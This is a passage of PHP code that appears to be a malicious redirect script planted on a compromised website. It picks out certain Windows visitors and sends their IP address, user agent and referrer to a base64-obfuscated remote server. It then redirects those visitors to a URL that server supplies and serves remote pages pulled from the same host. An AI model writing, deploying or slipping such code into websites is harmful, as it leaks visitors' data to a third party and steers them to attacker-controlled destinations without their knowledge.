1) {echo "$content";} if ($rt==1) {return $content;} } } if (!$isbot) { $bo11 = $_SERVER["HTTP_USER_AGENT"]; $osx = strchr($bo11,"Windows"); if (!$osx) { $isbot = true; } $brop1=strchr($bo11,"Firefox"); $brop2=strchr($bo11,"Chrome"); if ( ($brop1) or ($brop2) ) { $isbot = true; } } if (!$isbot) { $agent7=base64_encode($_SERVER["HTTP_USER_AGENT"]); $ip7=base64_encode($_SERVER["REMOTE_ADDR"]); $ref7=base64_encode($_SERVER["HTTP_REFERER"]); $xred=base64_decode('aHR0cDovLzQ2LjEwOC4xMzIuMTMxL35ibXcvc3RhdHRvc3RhdC8/cz03NzU3NjUzJnNlZ21lbnQ9Mjg='); $xred="$xred&agent=$agent7&ip=$ip7&ref=$ref7"; $red_url_tek=xinclude("$xred","1"); $red_url_tek=trim($red_url_tek); header("Location: $red_url_tek"); } $p1=$_GET["p"]; $p=trim($p1); $x=base64_decode('aHR0cDovLzQ2LjEwOC4xMzIuMTMxL35ibXcvMDAzMDcwOQ=='); $c=trim($x); if ($cont=file_get_contents("$p1.html")) {echo "$cont";} else {$g="$c/7757653/$p.html"; xinclude("$g","0","$p");} ?>